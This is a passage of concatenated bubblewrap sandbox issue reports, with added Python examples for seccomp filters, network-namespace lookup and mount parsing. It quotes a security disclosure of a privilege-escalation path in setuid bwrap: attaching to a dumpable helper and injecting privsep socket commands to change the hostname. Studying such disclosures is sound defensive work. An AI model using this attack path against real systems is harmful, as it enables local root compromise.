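        print("unprivileged user namespaces disabled via", blocker)
```

Run it as root or with a readable /boot on the machine where bwrap misbehaves; an "absent" CONFIG_DEVPTS_MULTIPLE_INSTANCES on a recent kernel is expected, a missing CONFIG_USER_NS or a blocking sysctl is the finding.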
A ./configure && make fails to create bwrap.1 from bwrap.xml using the 0.1.3 release tarball because bwrap.xml is not included.
Workaround is to use ./configure --disable-man or to copy the file from git.
Is it necessary to have --tmpfs use mode=755? I'm running sshd in bwrap and would like to allow other users to log in and be able to write to /tmp.
Hello,
bwrap seems to not work on my system. I can bind / to /, although then I get a read-only /dev. If I then add --dev /dev it does not work at all. Neither does bwrap --ro-bind / / sh work.
# ./bwrap --bind / / sh
# echo foo >/dev/null
sh: can't create /dev/null: Permission denied
# ./bwrap --dev /dev --bind / / sh
Can't bind mount /oldroot/ on /newroot/: Invalid argument
Can't read from privileged_op_socket
# ./bwrap --ro-bind / / sh
Can't bind mount /oldroot/ on /newroot/: No such file or directory
Can't read from privileged_op_socket
and with strace
# strace ./bwrap --ro-bind / / sh
execve("./bwrap", ["./bwrap", "--ro-bind", "/", "/", "sh"], [/* 76 vars */]) = 0
brk(NULL) = 0x1e8b000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f8e14039000
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=206103, ...}) = 0
mmap(NULL, 206103, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7f8e14006000
close(3) = 0
open("/lib64/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\340\10\2\0\0\0\0\0"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0755, st_size=1689000, ...}) = 0
mmap(NULL, 3795488, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f8e13a79000
mprotect(0x7f8e13c0e000, 2097152, PROT_NONE) = 0
mmap(0x7f8e13e0e000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x195000) = 0x7f8e13e0e000
mmap(0x7f8e13e14000, 14880, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f8e13e14000
close(3) = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f8e14005000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f8e14004000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f8e14003000
arch_prctl(ARCH_SET_FS, 0x7f8e14004700) = 0
mprotect(0x7f8e13e0e000, 16384, PROT_READ) = 0
mprotect(0x608000, 4096, PROT_READ) = 0
mprotect(0x7f8e1403a000, 4096, PROT_READ) = 0
munmap(0x7f8e14006000, 206103) = 0
capget({_LINUX_CAPABILITY_VERSION_3, 0}, {CAP_CHOWN|CAP_DAC_OVERRIDE|CAP_DAC_READ_SEARCH|CAP_FOWNER|CAP_FSETID|CAP_KILL|CAP_SETGID|CAP_SETUID|CAP_SETPCAP|CAP_LINUX_IMMUTABLE|CAP_NET_BIND_SERVICE|CAP_NET_BROADCAST|CAP_NET_ADMIN|CAP_NET_RAW|CAP_IPC_LOCK|CAP_IPC_OWNER|CAP_SYS_MODULE|CAP_SYS_RAWIO|CAP_SYS_CHROOT|CAP_SYS_PTRACE|CAP_SYS_PACCT|CAP_SYS_ADMIN|CAP_SYS_BOOT|CAP_SYS_NICE|CAP_SYS_RESOURCE|CAP_SYS_TIME|CAP_SYS_TTY_CONFIG|CAP_MKNOD|CAP_LEASE|CAP_AUDIT_WRITE|CAP_AUDIT_CONTROL|CAP_SETFCAP|CAP_MAC_OVERRIDE|CAP_MAC_ADMIN|CAP_SYSLOG|CAP_WAKE_ALARM|CAP_BLOCK_SUSPEND|CAP_AUDIT_READ, CAP_CHOWN|CAP_DAC_OVERRIDE|CAP_DAC_READ_SEARCH|CAP_FOWNER|CAP_FSETID|CAP_KILL|CAP_SETGID|CAP_SETUID|CAP_SETPCAP|CAP_LINUX_IMMUTABLE|CAP_NET_BIND_SERVICE|CAP_NET_BROADCAST|CAP_NET_ADMIN|CAP_NET_RAW|CAP_IPC_LOCK|CAP_IPC_OWNER|CAP_SYS_MODULE|CAP_SYS_RAWIO|CAP_SYS_CHROOT|CAP_SYS_PTRACE|CAP_SYS_PACCT|CAP_SYS_ADMIN|CAP_SYS_BOOT|CAP_SYS_NICE|CAP_SYS_RESOURCE|CAP_SYS_TIME|CAP_SYS_TTY_CONFIG|CAP_MKNOD|CAP_LEASE|CAP_AUDIT_WRITE|CAP_AUDIT_CONTROL|CAP_SETFCAP|CAP_MAC_OVERRIDE|CAP_MAC_ADMIN|CAP_SYSLOG|CAP_WAKE_ALARM|CAP_BLOCK_SUSPEND|CAP_AUDIT_READ, 0}) = 0
getuid() = 0
geteuid() = 0
capset({_LINUX_CAPABILITY_VERSION_3, 0}, {CAP_NET_ADMIN|CAP_SYS_CHROOT|CAP_SYS_ADMIN, CAP_NET_ADMIN|CAP_SYS_CHROOT|CAP_SYS_ADMIN, 0}) = 0
prctl(PR_SET_DUMPABLE, 1) = 0
prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) = 0
ioctl(1, TCGETS, {B38400 opost isig icanon echo ...}) = 0
ioctl(1, TCGETS, {B38400 opost isig icanon echo ...}) = 0
fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 2), ...}) = 0
brk(NULL) = 0x1e8b000
brk(0x1ead000) = 0x1ead000
readlink("/proc/self/fd/1", "/dev/pts/2", 4095) = 10
stat("/dev/pts/2", {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 2), ...}) = 0
getuid() = 0
getgid() = 0
open("/proc", O_RDONLY|O_PATH) = 3
mkdir("/run/user/0/.bubblewrap", 0755) = -1 ENOENT (No such file or directory)
mkdir("/tmp/.bubblewrap-0", 0755) = -1 EEXIST (File exists)
rt_sigprocmask(SIG_BLOCK, [CHLD], NULL, 8) = 0
clone(child_stack=0, flags=CLONE_NEWNS|SIGCHLD) = 1945
capset({_LINUX_CAPABILITY_VERSION_3, 0}, {0, 0, 0}) = 0
openat(3, "self/fd", O_RDONLY|O_NOCTTY|O_NONBLOCK|O_DIRECTORY|O_CLOEXEC) = 4
fstat(4, {st_mode=S_IFDIR|0500, st_size=0, ...}) = 0
fcntl(4, F_GETFL) = 0x18800 (flags O_RDONLY|O_NONBLOCK|O_LARGEFILE|O_DIRECTORY)
fcntl(4, F_SETFD, FD_CLOEXEC) = 0
getdents(4, /* 7 entries */, 32768) = 168
close(3) = 0
getdents(4, /* 0 entries */, 32768) = 0
close(4) = 0
signalfd4(-1, [CHLD], 8, SFD_CLOEXEC|SFD_NONBLOCK) = 3
poll([{fd=3, events=POLLIN}], 1, -1Can't bind mount /oldroot/ on /newroot/: No such file or directory
Can't read from privileged_op_socket
) = 1 ([{fd=3, revents=POLLIN}])
read(3, "\21\0\0\0\0\0\0\0\1\0\0\0\231\7\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"..., 128) = 128
exit_group(1) = ?
+++ exited with 1 +++
I am running a Gentoo system, with kernel 4.5.2, all but USER_NS enabled in kernel config. The /dev is tmpfs populated with busybox's mdev. No systemd either.
How do we leverage seccomp_export_bpf to generate rules? Is there a tool available? Does passing the compiled list to --seccomp result in rules to be whitelisted or blacklisted?
If bwrap creates a new user namespace for the sandbox by default, why does the --unshare-user option exist? To allow for custom UID/GID only?
The setsid() change broke my code because I use a seccomp whitelist, which didn't include setsid, and the seccomp filter gets installed prior to the call. To avoid problems like this in the future, the prctl call should be done as close to immediately prior to the execvp as possible.
change broke my code because I use a seccomp whitelist, which didn't include setsid
, and the seccomp filter gets installed prior to the call. To avoid problems like this in the future, the prctl call should be done as close to immediately prior to the execvp
as possible.
As it stands there's other calls that need to be placed in everyone's whitelist that don't need to be if the filter was installed last, which is unnecessary attack surface, though the benefits here are likely fairly minor since bubblewrap is done doing most of the exotic things by the time the filter is installed currently.
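The following is an added Python example (mine, not bubblewrap's code and not from either report above) showing what --seccomp FD actually consumes: bwrap reads the descriptor to end of file and installs the bytes as a raw BPF program, which is the same format libseccomp's seccomp_export_bpf() writes, so whether the result is a whitelist or a blacklist is decided entirely by the program you hand it. The code hand-assembles a whitelist (kill on a foreign architecture so the 32-bit entry points cannot bypass the list, EPERM for anything not listed), includes a small interpreter to check the filter against (arch, syscall) pairs before any process is killed by it, and passes it to bwrap through a pipe. The x86_64 syscall numbers and the contents of SYSCALLS_X86_64 are assumptions for illustration; as the setsid report explains, the list must also cover what bwrap itself calls between installing the filter and execve.

```python
import os
import struct
import subprocess

# Constants from <linux/filter.h>, <linux/seccomp.h> and <linux/audit.h>.
BPF_LD_W_ABS = 0x20        # BPF_LD | BPF_W | BPF_ABS
BPF_JMP_JEQ_K = 0x15       # BPF_JMP | BPF_JEQ | BPF_K
BPF_RET_K = 0x06           # BPF_RET | BPF_K
SECCOMP_RET_KILL_PROCESS = 0x80000000   # older kernels mask this to KILL (thread)
SECCOMP_RET_ERRNO = 0x00050000
SECCOMP_RET_ALLOW = 0x7FFF0000
AUDIT_ARCH_X86_64 = 0xC000003E
AUDIT_ARCH_I386 = 0x40000003
SECCOMP_DATA_NR = 0        # offsetof(struct seccomp_data, nr)
SECCOMP_DATA_ARCH = 4      # offsetof(struct seccomp_data, arch)
EPERM = 1

# Assumed x86_64 numbers for an illustrative whitelist. Besides what the
# sandboxed program needs, it has to cover what bwrap itself calls after the
# filter is installed and before execve (setsid per the report above, prctl),
# or bwrap dies instead of the program it was meant to confine.
SYSCALLS_X86_64 = {
    "read": 0, "write": 1, "open": 2, "close": 3, "fstat": 5, "mmap": 9,
    "mprotect": 10, "munmap": 11, "brk": 12, "rt_sigaction": 13,
    "rt_sigprocmask": 14, "ioctl": 16, "pread64": 17, "access": 21,
    "execve": 59, "readlink": 89, "setsid": 112, "prctl": 157,
    "arch_prctl": 158, "set_tid_address": 218, "exit_group": 231,
    "openat": 257, "newfstatat": 262, "set_robust_list": 273,
    "prlimit64": 302, "getrandom": 318, "rseq": 334,
}


def insn(code, jt, jf, k):
    """One struct sock_filter: u16 code, u8 jt, u8 jf, u32 k, native order."""
    return struct.pack("=HBBI", code, jt, jf, k)


def build_allowlist(syscall_nrs, arch=AUDIT_ARCH_X86_64,
                    deny=SECCOMP_RET_ERRNO | EPERM):
    """Raw BPF program: kill on any other architecture, allow the listed
    syscall numbers, otherwise return `deny` (EPERM by default, so a missing
    entry shows up as a failing call rather than a dead process)."""
    nrs = sorted(set(syscall_nrs))
    if len(nrs) > 255:
        raise ValueError("jump offsets are 8-bit; split the list")
    prog = [
        insn(BPF_LD_W_ABS, 0, 0, SECCOMP_DATA_ARCH),
        insn(BPF_JMP_JEQ_K, 1, 0, arch),
        insn(BPF_RET_K, 0, 0, SECCOMP_RET_KILL_PROCESS),
        insn(BPF_LD_W_ABS, 0, 0, SECCOMP_DATA_NR),
    ]
    # Each match jumps straight to the final ALLOW, past the remaining
    # comparisons and the deny instruction.
    for i, nr in enumerate(nrs):
        prog.append(insn(BPF_JMP_JEQ_K, len(nrs) - i, 0, nr))
    prog.append(insn(BPF_RET_K, 0, 0, deny))
    prog.append(insn(BPF_RET_K, 0, 0, SECCOMP_RET_ALLOW))
    return b"".join(prog)


def evaluate(prog, arch, nr):
    """Interpret the three opcodes build_allowlist emits against a synthetic
    seccomp_data and return the seccomp action the kernel would take."""
    insns = [struct.unpack("=HBBI", prog[i:i + 8]) for i in range(0, len(prog), 8)]
    data = {SECCOMP_DATA_NR: nr, SECCOMP_DATA_ARCH: arch}
    pc, acc = 0, 0
    while pc < len(insns):
        code, jt, jf, k = insns[pc]
        pc += 1
        if code == BPF_LD_W_ABS:
            acc = data[k]
        elif code == BPF_JMP_JEQ_K:
            pc += jt if acc == k else jf
        elif code == BPF_RET_K:
            return k
        else:
            raise ValueError("unsupported opcode 0x%x" % code)
    raise ValueError("program fell off the end")


def run_in_bwrap(argv, prog, bwrap="bwrap"):
    """Hand the program to bwrap via --seccomp FD. bwrap reads the fd to EOF
    and installs the bytes verbatim, so a pipe with its write end closed works."""
    rfd, wfd = os.pipe()
    os.write(wfd, prog)
    os.close(wfd)
    cmd = [bwrap, "--ro-bind", "/", "/", "--proc", "/proc", "--dev", "/dev",
           "--unshare-pid", "--seccomp", str(rfd)] + list(argv)
    try:
        return subprocess.run(cmd, pass_fds=(rfd,))
    finally:
        os.close(rfd)


if __name__ == "__main__":
    prog = build_allowlist(SYSCALLS_X86_64.values())
    run_in_bwrap(["/bin/true"], prog)
```

Check a new filter with evaluate() for each (arch, nr) you care about before wiring it into a launcher; if bwrap itself is the process that dies, the list is missing one of bwrap's own post-filter syscalls rather than the program's.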
I spent quite some time on this before realising what was happening. The ordering of the mounts seems to matter, else you get an error that isn't completely obvious (well, to me anyway).
A working example:
/usr/bin/bwrap --ro-bind /tmp/sandbox / --proc /proc [command]
Whereas with the mounts reversed:
/usr/bin/bwrap --proc /proc --ro-bind /tmp/sandbox / [command]
Can't bind mount /oldroot/tmp/sandbox on /newroot/: Invalid argument
Can't read from privileged_op_socket
Is this a bug or a user failure to understand/read the docs? Either way, it would still be nice to point this out to other users as an issue (with solution).
Sorry. Mistakenly created. Though I have a related question: my Debian chown is not working inside bwrap.
Running demos/bubblewrap-shell on bubblewrap 0.1.2 gets the following error
$ ./bubblewrap-shell.sh
execvp /bin/sh: No such file or directory
Not running a Fedora distro, in case that is an issue?
Distributor ID: Debian
Description: Debian GNU/Linux 8.4 (jessie)
Release: 8.4
Codename: jessie
I have been getting loads of related errors to the above while using bwrap, but thought I would make sure some of the demos worked first.
While testing https://bodhi.fedoraproject.org/updates/bubblewrap-0.1.4-5.fc25 on a F25 Vagrant box, I observed the following:
$ rpm -q bubblewrap
bubblewrap-0.1.4-5.fc25.x86_64
$ whoami
vagrant
$ bwrap --ro-bind / / bash
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
Despite the errors, the operation appeared successful.
There has been some interest in using flatpak for shipping services that listen on sockets. I think bubblewrap will need some support to make this work.
When using mount() inside of bubblewrap, there is always the MS_MGC_VAL flag.
However:
Specifying MS_MGC_VAL was required in kernel versions prior to 2.4, but since Linux 2.4 is no longer required and is ignored if specified.
http://man7.org/linux/man-pages/man2/mount.2.html
Is there still a reason it is used?
Can we instead take a reference to a fd which has the pre-compiled BPF to load?
We could port xdg-app and linux-user-chroot to this, installing in e.g. /usr/libexec/xdg-app/bubblewrap
I run an application using bubblewrap that forks off a number of background processes. When closing the application, the background processes are not always cleaned up, so if I run lsns, I will still see bwrap running and the background processes as its children. To clean up the namespace, I have to send the KILL signal to bwrap.
Is it possible for bwrap to automatically kill everything in the namespace when the foreground process terminates? Or is there a reason why that wouldn't be appropriate?
BTW, bubblewrap is awesome; thanks for writing it!
If I try to mount a encfs folder inside bwrap, I get the error:
fuse: device not found, try 'modprobe fuse' first
The fuse module is loaded, and encfs works fine when used outside of bwrap.
EDIT: I'm guessing this has something to do with encfs using fusermount, which has the setuid bit.
We're going to need to implement what Docker has now where we do MCS isolation. See:
The ugly part here is that basically the daemon maintains a global state of MCS labels that have been allocated. Without a daemon, we'd need to use some well-known shared state file (/run/bubblewrap/selinux?)
There's not much point to creating a new UTS namespace when the hostname/domainname are inherited, and CAP_SYS_ADMIN is dropped before user code is executed, making it generally "hard" to change the values.
It would be nice (and straight forward) to have the capability to set the hostname/domainname in the sandboxed child namespace.
I would like to point out that identifiers like "__MOUNTS_H__" and "__NETWORK_H__" do not fit the expected naming convention of the C++ language standard.
Would you like to adjust your selection for unique names?
While testing https://bodhi.fedoraproject.org/updates/bubblewrap-0.1.4-5.fc25 on a F25 Vagrant box, I observed the following (the /dev/null issue is #125):
$ rpm -q bubblewrap
bubblewrap-0.1.4-5.fc25.x86_64
[vagrant@localhost ~]$ whoami
vagrant
[vagrant@localhost ~]$ bwrap --ro-bind / / bash
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
$ sudo jou<tab key pressed>
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: _upvars: `-a2': invalid number specifier
bash: /dev/null: Permission denied
bash: _upvars: `-a0': invalid number specifier
I'm admittedly just mashing keys and probably not using bwrap as intended, but figured I would file this anyways.
Basically I built on RHEL7.2, tried to run the demo, but needed:
diff --git a/demos/bubblewrap-shell.sh b/demos/bubblewrap-shell.sh
index da06d49..a445660 100755
--- a/demos/bubblewrap-shell.sh
+++ b/demos/bubblewrap-shell.sh
@@ -5,6 +5,7 @@ set -euo pipefail
--dir /tmp \
--proc /proc \
--dev /dev \
+ --share-user \
--ro-bind /etc/resolv.conf /etc/resolv.conf \
--symlink usr/lib /lib \
--symlink usr/lib64 /lib64 \
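Review bot: the added --share-user in demos/bubblewrap-shell.sh is unconditional, so it gives up the user namespace on every system rather than only on the RHEL 7.2 kernel that motivated it, and it makes the demo depend on a privileged (setuid) bwrap to do its mounts. Make it conditional (try the unshared form first and fall back, or take it from an environment variable) and put a comment beside the flag saying it is a workaround for kernels without unprivileged user namespaces; nothing in the hunk records that this is a workaround rather than the intended configuration.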
I'm leaning a bit towards making --share-user the default, and you always have to say --unshare-user if you want that?
Maybe we have a --unshare-user-if-possible? Dunno.
If we don't have a DWIM in bwrap, the ergonomics are going to be annoying for consuming tools that want to support both modes.
There has just been a local root exploit on firejail using a race condition
netblue30/firejail#1020
I have not yet been able to reproduce this with bubblewrap but I have the feeling similar issues could affect bubblewrap as well.
Comparing how the two programs do things, is there any major difference that rules out these kinds of issues on bubblewrap?
This command fails:
$ bwrap --unshare-pid --ro-bind / / --dev /dev sh
Can't mount devpts on /newroot/dev/pts: Invalid argument
While this works:
$ bwrap --unshare-pid --ro-bind / / --dev /dev --proc /proc sh
sh-4.3$
No idea why...
Just an idea, but people might find it interesting to use bwrap instead of firejail. Here is a quick example to contain Skype and even use Xephyr instead of the current X session.
#!/bin/sh
# Nested X server on :9 so Skype never talks to the real session (-ac turns off access control on that display, so only do this on a single-user box).
Xephyr :9 -screen 600x700 -reset -terminate -host-cursor -ac 2> /dev/null &
sleep 3
DISPLAY=:9 metacity 2> /dev/null &
# PulseAudio client config without shm; a private directory avoids another user pre-creating the fixed /tmp name and supplying their own client.conf.
pulseconf=$(mktemp -d)
echo "enable-shm = no" > "$pulseconf/client.conf"
bwrap --ro-bind / / --tmpfs /home \
  --bind "/home/$USER/.Skype" "/home/$USER/.Skype" \
  --bind "/home/$USER/.config/Skype" "/home/$USER/.config/Skype" \
  --tmpfs /tmp --proc /proc --dev /dev --mqueue /dev/mqueue --chdir "/home/$USER" --unshare-pid \
  --tmpfs /run --ro-bind "/run/user/$(id -u)" "/run/user/$(id -u)" \
  --bind "$pulseconf" "/home/$USER/.config/pulse" \
  --unshare-cgroup-try --setenv DISPLAY :9 --tmpfs "/run/user/$(id -u)/gdm" skype
# using bwrap to make all read-only, make pulse work through new client.conf, hide home content except for skype dirs which are writable, new empty tmp, dev and proc, own pid namespace
# optionally use xephyr as display 9 and hide xauth cookie through tmpfs for /run/user/<id>/gdm
We could require the caller to call setenv() early on in their code, but it would seem more general to just expose e.g.:
bubblewrap --setenv LD_LIBRARY_PATH "$(LD_LIBRARY_PATH)"
These tools are not suitable to give to unprivileged users, because it is trivial to turn such access into to a fully privileged root shell on the host.
Broad claim. I don't see any evidence here.
While we allow the creation of a new netns, we don't allow configuring it, so our current support is "host network" or "none".
It would be quite interesting to allow root to delegate access to pre-configured network namespaces to bubblewrap users. This could be something like having an extended attribute or ACL on /proc/$pid/ns/net? (If /proc supported xattrs, which it doesn't.) So maybe we define this as having a /run/bwrap/netns/$netnsname symlink, and admins which want to grant access to a netns just do:
mkdir /run/bwrap/netns/no-vpn
ln -s /proc/$netnspid/ns/net /run/bwrap/netns/no-vpn/net
setfacl -m u:someuser:rx /run/bwrap/netns/no-vpn
And then a user could do:
bwrap --netns no-vpn
And we would try to readlink to see whether we could call setns?
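An added Python sketch of the name-to-namespace lookup the scheme above needs (illustrative, not code from bubblewrap; the /run/bwrap/netns/<name>/net layout follows the proposal, CLONE_NEWNET is the value from sched.h, and treating access(2)'s real-uid check as the grant is my assumption). The two checks are the point: the name must not be a path, otherwise --netns ../../proc/1/ns/net selects any namespace the helper can open, and the link must resolve to a /proc/<pid>/ns/net entry; setns() itself still needs CAP_SYS_ADMIN in the target namespace's owning user namespace, so a setuid bwrap would have to do it before dropping capabilities.

```python
import ctypes
import os
import re

NETNS_BASE = "/run/bwrap/netns"      # layout proposed above; hypothetical
CLONE_NEWNET = 0x40000000            # from <sched.h>
_NS_TARGET = re.compile(r"^/proc/[1-9][0-9]*/ns/net$")


def resolve_netns(name, base=NETNS_BASE):
    """Map a user-supplied namespace name to the /proc/<pid>/ns/net path the
    admin linked at base/<name>/net, refusing anything that would let the
    caller pick an arbitrary path instead of an admin-published name."""
    if not name or name in (".", "..") or "/" in name or "\0" in name:
        raise ValueError("invalid netns name %r" % name)
    entry = os.path.join(base, name)
    # access(2) checks against the real uid, which is what matters in a setuid
    # helper: the ACL the admin put on the directory is the grant (assumption).
    if not os.access(entry, os.R_OK | os.X_OK):
        raise PermissionError("not granted access to netns %r" % name)
    target = os.readlink(os.path.join(entry, "net"))
    if not _NS_TARGET.match(target):
        raise ValueError("netns %r does not point at a /proc/<pid>/ns/net" % name)
    return target


def enter_netns(target):
    """setns(2) into the network namespace behind target. Needs CAP_SYS_ADMIN
    in the owning user namespace, so this is the step a privileged bwrap would
    perform before dropping capabilities."""
    libc = ctypes.CDLL(None, use_errno=True)
    fd = os.open(target, os.O_RDONLY | os.O_CLOEXEC)
    try:
        if libc.setns(fd, CLONE_NEWNET) != 0:
            err = ctypes.get_errno()
            raise OSError(err, os.strerror(err), target)
    finally:
        os.close(fd)


if __name__ == "__main__":
    import sys
    path = resolve_netns(sys.argv[1])
    print("entering", path)
    enter_netns(path)
    os.execvp(sys.argv[2], sys.argv[2:])
```

Note that the readlink target is re-resolved by the kernel at open time, so the check on its shape only guards against mis-published links; the owner of the target pid can still exit, which makes the open fail rather than succeed against a different namespace.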
Sebastian Krahmer reported this to the oss-security mailing list.
There is a beautiful, easy to exploit, logical bug within the
bubblewrap program, that's part of the flatpak container-app framework,
but also used with other container solutions.
/usr/bin/bwrap may be installed mode 04755 or with cap_sys_admin and other
file caps. I don't know if there are any dists already shipping it that way,
but the Makefile and some RedHat spec files contain file caps for it.
bubblewrap's aim is to setup a container and seccomp sandbox for programs to be run
as user.
For some reason it sets the PR_SET_DUMPABLE flag, as seen below. The comment about
it looks strange to me. If that's really true, suid programs shouldn't
be forced to play with the dumpable flag to achieve their goal.
Once the dumpable flag is set, there is a chance we could attach to the process,
once the remaining caps are dropped and the whole process runs as user.
Luckily, that happens at line 1707, right after a PrivSep socket has been opened!
Once attached to the (now running as unprived user) process, we can inject
commands into that socket. We could do arbitrary mounts, but won't achieve much, since
the bwrap process is running in its own mount namespace. However, there is
a sethostname() OP, that we can use to affect the hostname of the entire system
(not restricted to UTS namespace). Now, just wait for root or other users to
login and execute bash to use one of the PS expansion bugs to execute code.
(I wonder that has been re-discovered recently, it was already part of the
CVE-2011-0966 attack vector.)
383 acquire_caps (void)
384 {
[...]
422 /* We need the process to be dumpable, or we can't access /proc/self/uid_map */
423 if (prctl (PR_SET_DUMPABLE, 1, 0, 0, 0) < 0)
424 die_with_error ("prctl(PR_SET_DUMPABLE) failed");
425 }
[...]
1422 int
1423 main (int argc,
1424 char **argv)
1425 {
[...]
1440 /* Get the (optional) capabilities we need, drop root */
1441 acquire_caps ();
[...]
1692 if (is_privileged)
1693 {
1694 pid_t child;
1695 int privsep_sockets[2];
1696
1697 if (socketpair (AF_UNIX, SOCK_SEQPACKET | SOCK_CLOEXEC, 0, privsep_sockets) != 0)
1698 die_with_error ("Can't create privsep socket");
1699
1700 child = fork ();
1701 if (child == -1)
1702 die_with_error ("Can't fork unprivileged helper");
1703
1704 if (child == 0)
1705 {
1706 /* Unprivileged setup process */
1707 drop_caps (); // BOOM
1708 close (privsep_sockets[0]);
1709 setup_newroot (opt_unshare_pid, privsep_sockets[1]);
1710 exit (0);
1711 }
1712 else
1713 {
1714 uint32_t buffer[2048]; /* 8k, but is int32 to guarantee nice alignment */
1715 uint32_t op, flags;
1716 const char *arg1, *arg2;
1717 cleanup_fd int unpriv_socket = -1;
1718
1719 unpriv_socket = privsep_sockets[0];
1720 close (privsep_sockets[1]);
1721
1722 do
1723 {
1724 op = read_priv_sec_op (unpriv_socket, buffer, sizeof (buffer),
1725 &flags, &arg1, &arg2);
1726 privileged_op (-1, op, flags, arg1, arg2);
1727 if (write (unpriv_socket, buffer, 1) != 1)
1728 die ("Can't write to op_socket");
1729 }
1730 while (op != PRIV_SEP_OP_DONE);
1731
1732 /* Continue post setup */
1733 }
1734 }
If you do a recursive remount (for instance to readonly) we don't properly handle mounts covering other mounts. For instance, if we have mounts in this order: /foo /foo/bar /foo, then the last one covers the other two, but we will try to remount the first two, probably failing due to the wrong permissions.
To properly handle this we need to parse the mount id and parent id in /proc/*/mountinfo and take ordering into account.
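An added Python example (mine, not bubblewrap's code) of the mountinfo bookkeeping described above: parse the mount ID, parent ID and mount point from /proc/self/mountinfo, then work out which mounts are actually reachable, treating a mount as covered when a later mount sits on the same path under the same parent, or when its own parent is covered. Only the reachable mounts under the requested prefix are returned as remount targets, so the covered /foo and /foo/bar from the scenario above are skipped instead of failing. The sample mountinfo text is constructed to reproduce that /foo, /foo/bar, /foo case plus an escaped path.

```python
import re
from dataclasses import dataclass


@dataclass
class Mount:
    id: int
    parent: int
    mountpoint: str
    fstype: str


# Constructed sample: / then /foo, /foo/bar under it, then a second /foo that
# covers both, plus a mount point containing a space (escaped as \040).
SAMPLE_MOUNTINFO = (
    "20 1 8:1 / / rw,relatime - ext4 /dev/sda1 rw\n"
    "21 20 0:30 / /foo rw,relatime - tmpfs tmpfs rw\n"
    "22 21 0:31 / /foo/bar rw,relatime - tmpfs tmpfs rw\n"
    "23 20 0:32 / /foo rw,relatime - tmpfs tmpfs rw\n"
    "24 20 0:33 / /a\\040b rw,relatime - tmpfs tmpfs rw\n"
)

_OCTAL = re.compile(r"\\([0-7]{3})")


def _unescape(field):
    """mountinfo escapes space, tab, newline and backslash as \\ooo."""
    return _OCTAL.sub(lambda m: chr(int(m.group(1), 8)), field)


def parse_mountinfo(text):
    """Parse /proc/<pid>/mountinfo lines into Mount records, in listing order
    (the kernel lists mounts in creation order, so parents precede children).
    Fields: id parent major:minor root mountpoint opts [optional...] - fstype source superopts."""
    mounts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        head, _, tail = line.partition(" - ")
        fields = head.split()
        mounts.append(Mount(int(fields[0]), int(fields[1]),
                            _unescape(fields[4]), tail.split()[0]))
    return mounts


def reachable_mounts(mounts):
    """Mounts that are actually visible through the VFS. A mount is covered,
    hence unreachable, when a later mount sits on the same mountpoint under
    the same parent, or when its own parent is unreachable. Remounting a
    covered mount either fails or changes flags on something nobody can see."""
    ids = {m.id for m in mounts}
    topmost = {}
    for m in mounts:
        topmost[(m.parent, m.mountpoint)] = m.id   # last one listed is on top
    reachable = set()
    for m in mounts:
        if topmost[(m.parent, m.mountpoint)] != m.id:
            continue
        if m.parent in ids and m.parent not in reachable:
            continue
        reachable.add(m.id)
    return [m for m in mounts if m.id in reachable]


def remount_targets(mounts, prefix):
    """Mountpoints a recursive remount of `prefix` should touch: reachable
    mounts at or below prefix, parents before children."""
    prefix = prefix.rstrip("/") or "/"

    def under(path):
        return prefix == "/" or path == prefix or path.startswith(prefix + "/")

    return [m.mountpoint for m in reachable_mounts(mounts) if under(m.mountpoint)]


if __name__ == "__main__":
    with open("/proc/self/mountinfo") as f:
        live = parse_mountinfo(f.read())
    covered = {m.id for m in live} - {m.id for m in reachable_mounts(live)}
    for m in live:
        if m.id in covered:
            print("covered:", m.id, m.mountpoint, m.fstype)
```

On a real system the covered set is usually empty, which is exactly why the bug only shows up in sandboxes that stack binds on top of each other.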
Let's describe the rationale for this.